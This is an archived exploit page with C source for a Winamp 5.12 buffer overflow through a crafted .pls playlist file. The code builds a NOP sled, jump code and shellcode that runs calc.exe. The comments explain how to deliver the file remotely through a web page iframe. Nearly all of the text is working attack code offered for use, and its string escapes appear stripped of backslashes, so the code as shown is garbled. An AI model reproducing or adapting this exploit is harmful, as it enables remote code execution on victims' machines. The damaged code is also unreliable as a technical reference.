Winamp <= 5.12 (Crafted PLS) Remote Buffer Overflow Exploit (0-Day)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Winamp <= 5.12 (Crafted PLS) Remote Buffer Overflow Exploit (0-Day)
# Published : 2006-01-29
# Author : ATmaCA
# Previous Title : SHOUTcast <= 1.9.4 File Request Format String Exploit (Leaked)
# Next Title : Sami FTP Server 2.0.1 Remote Stack Based Buffer Overflow PoC

/*
*
* Winamp 5.12 Remote Buffer Overflow Universal Exploit (Zero-Day)
* Bug discovered & exploit coded by ATmaCA
* Web: http://www.spyinstructors.com  && http://www.atmacasoft.com
* E-Mail: atmaca@icqmail.com
* Credit to Kozan
*
*/

/*
*
* Tested with :
* Winamp 5.12 on Win XP Pro Sp2
*
*/

/*
* Usage:
*
* Execute exploit, it will create "crafted.pls" in current directory.
* Duble click the file, or single click right and then select "open".
* And Winamp will launch a Calculator (calc.exe)
*
*/

/*
*
* For to use it remotly,
* make a html page containing an iframe linking to the .pls file.
*
* http://www.spyinstructors.com/atmaca/research/winamp_ie_poc.htm
*
*/

#include <windows.h>
#include <stdio.h>

#define BUF_LEN         0x045D
#define PLAYLIST_FILE   "crafted.pls"

char szPlayListHeader1[] = "[playlist]rnFile1=\\";
char szPlayListHeader2[] = "rnTitle1=~BOF~rnLength1=FFFrnNumberOfEntries=1rnVersion=2rn";

// Jump to shellcode
char jumpcode[] = "x61xD9x02x02x83xECx34x83xECx70xFFxE4";

// Harmless Calc.exe
char shellcode[] =
        "x54x50x53x50x29xc9x83xe9xdexe8xffxffxffxffxc0x5ex81x76x0ex02"
        "xddx0ex4dx83xeexfcxe2xf4xfex35x4ax4dx02xddx85x08x3ex56x72x48"
	"x7axdcxe1xc6x4dxc5x85x12x22xdcxe5x04x89xe9x85x4cxecxecxcexd4"
	"xaex59xcex39x05x1cxc4x40x03x1fxe5xb9x39x89x2ax49x77x38x85x12"
	"x26xdcxe5x2bx89xd1x45xc6x5dxc1x0fxa6x89xc1x85x4cxe9x54x52x69"
        "x06x1ex3fx8dx66x56x4ex7dx87x1dx76x41x89x9dx02xc6x72xc1xa3xc6"
	"x6axd5xe5x44x89x5dxbex4dx02xddx85x25x3ex82x3fxbbx62x8bx87xb5"
	"x81x1dx75x1dx6axa3xd6xafx71xb5x96xb3x88xd3x59xb2xe5xbex6fx21"
	"x61xddx0ex4d";


int main(int argc,char *argv[])
{
        printf("nWinamp 5.12 Remote Buffer Overflow Universal Exploit");
        printf("nBug discovered & exploit coded by ATmaCA");
        printf("nWeb: http://www.spyinstructors.com  && http://www.atmacasoft.com");
        printf("nE-Mail: atmaca@icqmail.com");
        printf("nCredit to Kozan");

        FILE *File;
        char *pszBuffer;

        if ( (File = fopen(PLAYLIST_FILE,"w+b")) == NULL ) {
                printf("n [Err:] fopen()");
                exit(1);
        }

        pszBuffer = (char*)malloc(BUF_LEN);
        memset(pszBuffer,0x90,BUF_LEN);
        memcpy(pszBuffer,szPlayListHeader1,sizeof(szPlayListHeader1)-1);
        memcpy(pszBuffer+0x036C,shellcode,sizeof(shellcode)-1);
        memcpy(pszBuffer+0x0412,jumpcode,sizeof(jumpcode)-1);
        memcpy(pszBuffer+0x0422,szPlayListHeader2,sizeof(szPlayListHeader2)-1);

        fwrite(pszBuffer, BUF_LEN, 1,File);
        fclose(File);

        printf("nn"  PLAYLIST_FILE  " has been created in the current directory.n");
        return 1;
}

// www.Syue.com [2006-01-29]